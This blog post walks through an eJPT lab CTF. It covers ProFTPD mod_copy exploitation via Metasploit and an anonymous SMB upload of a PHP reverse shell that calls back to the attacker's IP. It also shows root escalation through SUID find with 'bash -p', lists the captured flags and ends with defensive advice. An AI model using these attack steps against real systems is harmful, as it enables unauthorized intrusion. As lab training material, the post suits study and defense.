Post

Host & Network Penetration Testing: Exploitation CTF 3 Walkthrough

Posted
By Aurojit Das
11 min read
Host & Network Penetration Testing: Exploitation CTF 3 Walkthrough

This walkthrough covers the third exploitation CTF challenge from the eJPT learning path, demonstrating service exploitation, local enumeration, SMB misconfiguration attacks, and privilege escalation techniques commonly encountered in real-world penetration testing scenarios.

Overview

Target 1: target1.ine.local (192.205.121.3)
Target 2: target2.ine.local (192.205.121.4)
Attacker: 192.205.121.2
Objectives: Exploit vulnerable services and retrieve 4 flags
Key Skills: ProFTPD exploitation, local service enumeration, SMB share abuse, SUID privilege escalation

Target 1: ProFTPD Exploitation & Local Service Enumeration

Challenge 1: Exploiting Vulnerable Service

Objective: “A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.”

Step 1: Initial Reconnaissance

Starting with comprehensive port scanning to identify our attack surface:

1

nmap -sV -sC -O -p- target1.ine.local -oX target1.txt

Nmap Results:

1
2
3
4
5

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Key Findings:

  • Port 21: ProFTPD 1.3.5 (FTP service)
  • Port 80: Apache 2.4.41 (Web server)

The Apache server displays a default Ubuntu page, but ProFTPD 1.3.5 stands out as potentially vulnerable. The default page reveals important information - it mentions the document root is at /var/www/html/index.html, which will be useful later.

Step 2: Vulnerability Research

Using searchsploit to identify known exploits for this specific version:

1

searchsploit ProFTPD 1.3.5

Searchsploit Results:

1
2
3
4

ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)     | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution           | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)       | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                     | linux/remote/36742.txt

Multiple exploits available for the mod_copy vulnerability. This module allows arbitrary file copying, which can be leveraged for remote code execution when combined with web server access.

Step 3: Metasploit Exploitation

Launching Metasploit and configuring the exploit module:

1
2
3
4

msfconsole
search ProFTPD 1.3.5
use exploit/unix/ftp/proftpd_modcopy_exec
show options

Initial Configuration:

1
2
3

set rhosts target1.ine.local
set lhost 192.205.121.2
run

Initial Attempt - Failed:

1
2

[-] 192.205.121.3:80 - Exploit aborted due to failure: unknown: 192.205.121.3:21 - Failure copying PHP payload to website path, directory not writable?
[*] Exploit completed, but no session was created.

The exploit failed because the default SITEPATH value (/var/www) is incorrect. By examining the Apache default page content, we confirm the web root is actually at /var/www/html.

Corrected Configuration:

1
2

set sitepath /var/www/html
run

Exploitation Success:

1
2
3
4
5

[*] Started reverse TCP handler on 192.205.121.2:4444 
[*] 192.205.121.3:80 - 192.205.121.3:21 - Connected to FTP server
[*] 192.205.121.3:80 - 192.205.121.3:21 - Sending copy commands to FTP server
[*] 192.205.121.3:80 - Executing PHP payload /7Plrr.php
[*] Command shell session 1 opened (192.205.121.2:4444 -> 192.205.121.3:54408)

Despite error messages about cleanup, a command shell session was successfully established. The exploit works by copying a malicious PHP file to the web root via FTP’s SITE CPFR/CPTO commands, then executing it through the web server.

Step 4: Shell Upgrade

Upgrading the basic shell to a more stable Meterpreter session:

1
2
3

sessions
sessions -u 1
sessions -i 2

Session Upgrade Results:

1
2
3

[*] Upgrading session ID: 1
[*] Sending stage (1017704 bytes) to 192.205.121.3
[*] Meterpreter session 2 opened (192.205.121.2:4433 -> 192.205.121.3:39560)

Step 5: Flag Retrieval

Navigating to the root directory and retrieving the flag:

1
2

meterpreter > ls /
meterpreter > cat /flag1.txt

Flag 1 Content:

1
2

FLAG1{0a83cebcc5ae418885cb63beda00d0a9}
Remember, the magical word is 'letmein'

🚩 Flag 1: FLAG1{0a83cebcc5ae418885cb63beda00d0a9}

The flag includes a hint about a “magical word” - this will be relevant for the next challenge.

Challenge 2: Local Service Enumeration

Objective: “Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.”

Step 1: Shell Interaction

Dropping from Meterpreter to a standard shell for better compatibility with system tools:

1
2

meterpreter > shell
/bin/bash -i

Step 2: Network Service Enumeration

Enumerating listening services on the target system:

1

netstat -tulpn

Netstat Results:

1
2
3
4
5

Proto Local Address           Foreign Address         State       
tcp   0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp   0.0.0.0:80              0.0.0.0:*               LISTEN      
tcp   127.0.0.11:33345        0.0.0.0:*               LISTEN      
tcp   127.0.0.1:8888          0.0.0.0:*               LISTEN

Analysis: A service is listening on localhost port 8888 - this is only accessible from within the target system, not from external networks. This is why it didn’t appear in our initial nmap scan. Local-only services often contain sensitive information or functionality.

Step 3: Service Interaction

Attempting to connect with curl:

1

curl http://127.0.0.1:8888

Curl Results:

1

curl: (1) Received HTTP/0.9 when not allowed

The curl attempt fails due to protocol version incompatibility. Switching to netcat for raw TCP communication:

1

nc 127.0.0.1 8888

Service Response:

1
2

Enter the secret passphrase: letmein
FLAG2{395a86d12b4949a99b68c499e0eb47ad}

Using the passphrase from Flag 1’s hint successfully retrieves the second flag. This demonstrates how information discovered in one phase of exploitation can be leveraged in subsequent phases.

🚩 Flag 2: FLAG2{395a86d12b4949a99b68c499e0eb47ad}

Target 2: SMB Misconfiguration & Privilege Escalation

Challenge 3: SMB Share Exploitation

Objective: “A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?”

Step 1: Target Reconnaissance

Scanning the second target for available services:

1

nmap -sV -sC -O -p- target2.ine.local -oX target2.txt

Nmap Results:

1
2
3
4
5
6

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Can you Pwn me?
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Key Findings:

  • Port 80: Apache web server with title “Can you Pwn me?”
  • Ports 139/445: Samba SMB services

The presence of SMB alongside a web server suggests potential for file upload attacks.

Step 2: SMB Vulnerability Research

Checking for known exploits:

1
2

searchsploit smbd 4.6.2
searchsploit samba 4.6.2

No direct exploits found for this version. Shifting focus to configuration analysis rather than software vulnerabilities.

Step 3: SMB Share Enumeration

Using Metasploit’s SMB enumeration module:

1
2
3
4

msfconsole
use auxiliary/scanner/smb/smb_enumshares
set rhosts target2.ine.local
run

Share Enumeration Results:

1
2
3

[+] 192.205.121.4:445 - print$ - (DISK) Printer Drivers
[+] 192.205.121.4:445 - site-uploads - (DISK) 
[+] 192.205.121.4:445 - IPC$ - (IPC|SPECIAL) IPC Service

Analysis: The site-uploads share name strongly suggests it’s connected to the web server. This is a common misconfiguration where administrative shares are accessible without authentication.

Verifying with smbclient:

1
2
3

smbclient -L target2.ine.local
smbclient //target2.ine.local/site-uploads
# Password: (blank - anonymous access)

SMB Access Results:

1
2
3
4

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Nov 19 13:25:31 2024
  ..                                  D        0  Tue Nov 19 13:25:31 2024

Anonymous access granted with an empty share directory.

Step 4: Testing File Upload

Creating a test file to verify write permissions:

1
2

nano test.txt
# (create simple test file)

Uploading via SMB:

1
2

smb: \> put test.txt
putting file test.txt as \test.txt (0.7 kb/s)

Verifying web accessibility:

  • Navigate to: http://target2.ine.local/site-uploads/test.txt
  • Result: File is accessible through the web server

This confirms we can upload files to the SMB share that are then served by the web server - a critical vulnerability enabling remote code execution.

Step 5: PHP Reverse Shell Upload

Preparing the payload:

1
2

cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php

Payload Configuration:

1
2

$ip = '192.205.121.2';   // Attacker IP
$port = 1234;            // Listener port

Uploading the reverse shell:

1
2

smbclient //target2.ine.local/site-uploads
smb: \> put php-reverse-shell.php

Setting up netcat listener:

1

nc -lnvp 1234

Triggering the shell by accessing: http://target2.ine.local/site-uploads/php-reverse-shell.php

Connection Received:

1
2
3

connect to [192.205.121.2] from (UNKNOWN) [192.205.121.4] 50906
Linux target2.ine.local 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Successfully obtained shell access as the www-data user.

Step 6: Flag Retrieval

1
2

$ ls /
$ cat /flag3.txt

Flag 3 Content:

1

FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab}

🚩 Flag 3: FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab}

Challenge 4: Privilege Escalation via SUID

Objective: “Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?”

Step 1: SUID Binary Enumeration

Searching for SUID binaries that could enable privilege escalation:

1

find / -type f -perm -4000 -user root 2>/dev/null

Command Explanation:

  • find / - Search from root directory
  • -type f - Only find files
  • -perm -4000 - Find files with SUID bit set
  • -user root - Owned by root user
  • 2>/dev/null - Suppress error messages

SUID Binaries Found:

1
2
3
4
5
6
7
8
9
10

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find         <-- Potential exploit vector
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount

Analysis: The /usr/bin/find binary with SUID permissions is particularly interesting. When a SUID binary runs, it executes with the permissions of its owner (root in this case). The find command’s -exec flag allows arbitrary command execution, creating a privilege escalation opportunity.

Step 2: Exploiting Find for Root Access

Using find’s -exec flag to spawn a privileged shell:

1

/usr/bin/find . -exec /bin/bash -p \; -quit

Command Breakdown:

  • /usr/bin/find . - Execute find command (with SUID permissions)
  • -exec /bin/bash -p - Execute bash with -p flag (preserves SUID privileges)
  • \; - Terminates the -exec command
  • -quit - Exit after first match

Privilege Escalation Success:

1
2

whoami
# root

Root access achieved. The -p flag on bash is crucial here - it prevents bash from dropping the elevated privileges that come from the SUID bit.

Step 3: Final Flag Retrieval

Navigating to the root home directory:

1
2
3

cd /root
ls
cat flag4.txt

Flag 4 Content:

1

FLAG4{6be1886437f946ac851b2d6b810a7a74}

🚩 Flag 4: FLAG4{6be1886437f946ac851b2d6b810a7a74}

Attack Chain Summary

This exercise demonstrated a complete penetration testing methodology:

Target 1 Attack Flow:

  1. Port Scanning - Identified ProFTPD 1.3.5 and Apache services
  2. Vulnerability Research - Found mod_copy exploit for ProFTPD
  3. Web Root Discovery - Analyzed default page to determine correct path
  4. Initial Exploitation - Used Metasploit to gain command shell
  5. Shell Upgrade - Upgraded to Meterpreter for stability
  6. Local Enumeration - Discovered hidden service on port 8888
  7. Password Reuse - Used hint from Flag 1 to access local service

Target 2 Attack Flow:

  1. Service Enumeration - Identified SMB and web services
  2. Share Analysis - Found misconfigured SMB share with write access
  3. Upload Testing - Verified files in SMB share are web-accessible
  4. Payload Delivery - Uploaded PHP reverse shell
  5. Code Execution - Triggered shell via web access
  6. Privilege Escalation - Exploited SUID find binary for root access

Key Techniques Demonstrated

ProFTPD mod_copy Exploitation - Leveraged file copy vulnerability combined with web server access to achieve remote code execution through carefully placed PHP payloads.

Local Service Discovery - Demonstrated importance of post-exploitation enumeration to discover services only accessible from localhost.

SMB Misconfiguration - Exploited anonymous write access to web-accessible directories for payload delivery.

SUID Privilege Escalation - Used improperly configured SUID binaries to escalate from web server user to root privileges.

Vulnerabilities Exploited

Outdated Software - ProFTPD 1.3.5 contained known vulnerabilities enabling initial access.

Weak Access Controls - SMB share allowed anonymous write access to web-accessible directory.

Improper SUID Configuration - The find binary with SUID permissions enabled trivial privilege escalation.

Service Integration Issues - Combining SMB write access with web server execution created attack vector.

Defense Strategies

Software Updates: Maintain current versions of all services, particularly internet-facing ones like FTP and web servers.

Least Privilege: Implement strict access controls on file shares and limit write permissions to necessary users only.

SUID Auditing: Regularly audit SUID binaries and remove unnecessary SUID bits from executables that don’t require elevated privileges.

Network Segmentation: Restrict access to administrative services and use host-based firewalls to limit exposure.

Service Isolation: Avoid configurations where compromising one service provides access to another.

Captured Flags

  • Flag 1: FLAG1{0a83cebcc5ae418885cb63beda00d0a9} - ProFTPD mod_copy exploitation
  • Flag 2: FLAG2{395a86d12b4949a99b68c499e0eb47ad} - Local service enumeration
  • Flag 3: FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab} - SMB share file upload
  • Flag 4: FLAG4{6be1886437f946ac851b2d6b810a7a74} - SUID privilege escalation

Conclusion

This CTF challenge effectively demonstrates how multiple security weaknesses combine to enable complete system compromise. The progression from service exploitation through local enumeration to privilege escalation illustrates realistic attack patterns that security professionals must understand and defend against.

The key lesson is that security requires a holistic approach - even when individual services appear hardened, misconfigurations and integration issues can create exploitable attack chains. Each phase of this engagement built upon previous discoveries, demonstrating the importance of thorough enumeration and systematic exploitation methodology.

For aspiring penetration testers, this lab reinforces the value of methodical reconnaissance, creative thinking about service interactions, and persistence in post-exploitation enumeration. The combination of automated tools (Metasploit, Nmap) with manual analysis produced the most effective results.

This writeup is part of the eJPT certification journey, demonstrating practical penetration testing skills in a controlled lab environment.

Write-Ups, eJPT
proftpd smb privilege-escalation metasploit reverse-shell
This post is licensed under CC BY 4.0 by the author.